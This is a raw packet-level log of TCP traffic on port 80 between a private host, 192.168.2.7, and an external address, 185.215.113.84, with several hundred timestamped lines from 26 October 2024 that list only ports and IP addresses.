Oct 26, 2024 07:27:22.002199888 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002217054 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002222061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002230883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002247095 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002249002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002263069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002270937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002274036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002285957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002300978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002304077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002316952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002321959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002329111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002341032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002342939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002357006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002367973 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002372026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002378941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002397060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002404928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002408981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002413988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002422094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002439976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002443075 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002451897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002461910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002465010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002476931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002484083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002491951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002501965 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002505064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002518892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002527952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002531052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002537012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002545118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002556086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002583981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.006918907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.006939888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.006951094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.007000923 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.007009983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.007041931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.007052898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.007062912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.007074118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.007080078 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.007088900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.007098913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.007117987 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.007154942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.046808004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.046823025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.046833992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.046845913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.046859026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.046870947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.046891928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.046933889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.046936035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047121048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047132969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047146082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047157049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047164917 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047168016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047175884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047210932 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047255993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047266960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047303915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047430992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047444105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047455072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047467947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047489882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047519922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047573090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047585964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047593117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047631979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047754049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047766924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047777891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047789097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047796965 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047806978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047813892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047821045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047842979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047862053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047895908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047908068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047919035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.047955990 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.047967911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048041105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048053026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048089981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048190117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048199892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048209906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048223019 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048233986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048233986 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048243046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048274040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048367977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048381090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048417091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048528910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048541069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048552990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048564911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048568010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048593998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048614025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048690081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048702955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048713923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048724890 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048738003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048738003 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048774958 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048846006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048858881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048870087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.048875093 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048885107 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.048914909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049016953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049026966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049071074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049170971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049182892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049195051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049205065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049216986 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049221992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049247026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049257040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049341917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049354076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049365997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049377918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049388885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049392939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049432039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049432039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049521923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049535036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049546957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049556971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049559116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049571991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049587965 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049690008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049701929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049712896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049726009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049726963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049737930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049751997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.049752951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049782038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049792051 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.049843073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.050143003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.050154924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.050165892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.050195932 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.050214052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.050273895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.052010059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.089680910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.089694023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.089705944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.089775085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.089787006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.089799881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.089811087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.089854956 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.090552092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.090572119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.090584040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.090595007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.090607882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.090619087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.090620041 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.090640068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.090658903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.104259968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.104273081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.104286909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.104298115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.104310036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.104320049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.104338884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.104383945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.104397058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.104407072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.104443073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119442940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119463921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119483948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119491100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119514942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119523048 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119592905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119611025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119636059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119640112 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119657993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119666100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119755030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119771004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119786978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119801998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119810104 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119821072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119846106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119862080 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119915962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119930983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119946957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119963884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119972944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.119982004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.119997025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120008945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120026112 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120079041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120095968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120110989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120115995 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120129108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120136023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120141983 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120145082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120170116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120187998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120398998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120415926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120430946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120435953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120448112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120455980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120464087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120474100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120484114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120502949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120573044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120589018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120605946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120619059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120623112 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120645046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120671034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120712996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120728970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120743990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120769978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120796919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120871067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120883942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120898962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120914936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120918036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120930910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120930910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120944977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120949030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120963097 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.120965004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.120989084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121016026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121131897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121145964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121161938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121162891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121189117 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121200085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121306896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121323109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121339083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121351957 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121356010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121372938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121376991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121376991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121388912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.121395111 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121414900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.121433020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.124466896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124635935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124650002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124682903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.124732018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.124789953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124804974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124820948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124836922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124844074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.124867916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.124892950 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.124954939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124972105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124984026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.124989033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.125006914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.125019073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.163829088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.163853884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.163877010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.163892031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.163908958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.163925886 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.163925886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.163944006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.163959980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.163980961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.164170027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.164186001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.164202929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.164216995 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.164217949 CEST	80	49982	185.215.113.84	192.168.2.7
